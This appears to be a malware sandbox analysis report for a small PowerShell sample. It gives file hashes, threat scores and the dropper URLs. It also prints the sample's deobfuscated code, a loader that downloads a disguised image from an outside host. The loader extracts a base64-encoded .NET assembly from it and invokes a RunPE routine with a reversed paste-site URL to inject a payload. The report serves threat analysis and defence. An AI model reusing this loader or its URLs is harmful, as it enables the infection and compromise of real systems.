Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

10

2efb8e05f9...9e.ps1

windows7-x64

8

2efb8e05f9...9e.ps1

windows10-2004-x64

8

Sharing

Copy URL
Twitter E-mail

General

  • Target

    2efb8e05f9b74fb551ceab2883a98e2e2300a4f29b050c0b747ba8250caf0c9e.unknown

  • Size

    1KB

  • Sample

    240704-bm7lzswfnm

  • MD5

    7c81cf8237e58f041ef1627eb04a2611

  • SHA1

    da3d8d66045d951a1c57f04316e3e27e450fd3f4

  • SHA256

    2efb8e05f9b74fb551ceab2883a98e2e2300a4f29b050c0b747ba8250caf0c9e

  • SHA512

    327e3792c508b69e7bf9e7b91bbae0591bcf2e3a0fed6065e02266f5fc63f08ab86576d72f9b1d17a0a886521cde2b32101f729f83be14cd374be062f93089c4

Score
10/10
execution

Malware Config

Extracted

Language
ps1
Deobfuscated
1
# powershell snippet 0
2
"$link = 'https://uploaddeimagens.com.br/images/004/807/053/original/new_image.jpg?1719846235'; $webClient = New-Object System.Net.WebClient; try { $downloadedData = $webClient.DownloadData($link) } catch { Write-Host 'Failed To download data from $link' -ForegroundColor Red; exit }; if ($downloadedData -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($downloadedData); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('RunPE.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.1etsap/mv1d1u2b/war/ved.edocetsap//:sptth' , 'desativado' , 'desativado' , 'desativado','AddInProcess32','')) } }"|invoke-expression
3
4
# powershell snippet 1
5
$link = "https://uploaddeimagens.com.br/images/004/807/053/original/new_image.jpg?1719846235"
6
$webclient = new-object system.net.webclient
7
try {
8
$downloadeddata = $webclient.downloaddata("https://uploaddeimagens.com.br/images/004/807/053/original/new_image.jpg?1719846235")
9
} catch {
10
write-host "Failed To download data from $link" -foregroundcolor red
11
exit
12
}
13
14
if ($downloadeddata -ne $null) {
15
$imagetext = ([system.text.encoding]::ascii).getstring($downloadeddata)
16
$startflag = "<<BASE64_START>>"
17
$endflag = "<<BASE64_END>>"
18
$startindex = $imagetext.indexof("<<BASE64_START>>")
19
$endindex = $imagetext.indexof("<<BASE64_END>>")
20
if ($startindex -ge 0 -and $endindex -gt $startindex) {
URLs
ps1.dropper

https://uploaddeimagens.com.br/images/004/807/053/original/new_image.jpg?1719846235
exe.dropper

https://uploaddeimagens.com.br/images/004/807/053/original/new_image.jpg?1719846235

Targets

    • Target

      2efb8e05f9b74fb551ceab2883a98e2e2300a4f29b050c0b747ba8250caf0c9e.unknown

    • Size

      1KB

    • MD5

      7c81cf8237e58f041ef1627eb04a2611

    • SHA1

      da3d8d66045d951a1c57f04316e3e27e450fd3f4

    • SHA256

      2efb8e05f9b74fb551ceab2883a98e2e2300a4f29b050c0b747ba8250caf0c9e

    • SHA512

      327e3792c508b69e7bf9e7b91bbae0591bcf2e3a0fed6065e02266f5fc63f08ab86576d72f9b1d17a0a886521cde2b32101f729f83be14cd374be062f93089c4

    Score
    8/10
    execution

    • Blocklisted process makes network request

    behavioral1behavioral2

MITRE ATT&CK Enterprise v15

Tasks

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.